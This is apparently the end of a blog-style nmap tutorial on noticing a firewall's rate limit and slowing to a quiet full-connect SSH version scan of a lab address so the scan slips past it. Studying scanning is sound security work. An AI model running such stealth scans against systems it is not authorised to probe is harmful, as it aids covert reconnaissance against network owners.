This is a rate limit, if we see this in place we know that there is a firewall, and we know that this report may or may not be accurate. At this stage of the game, we know we need to do two things — one we need to switch our method from half open scanning, because the firewall in place is chewing it up, and two we need to slow down our scan a LOT, while still keeping it meaningful. This is where we can use a little bit of common sense, we know that this has a proxy and a webserver running on it. So maybe there is an ssh service as well? Let’s see.

We will try something like this

sudo nmap -sT -PN -sV -v -T1 -p 22 192.168.0.2

And as you can see we cut right through the smoke and mirrors and got our SSH versioning information in a matter of seconds.

Hopefully this was enjoyable and you learned a little bit about one of the greatest vulnerability scanning tools around. Oh and if you’re wondering how ANY of this was different from using nmap -T4 -v -A , which is ever so popular — remember you want to make as LITTLE noise as possible , note the -A basically just runs all scanning options including all the NSE scripts nmap has access to — this is usually unnecessary.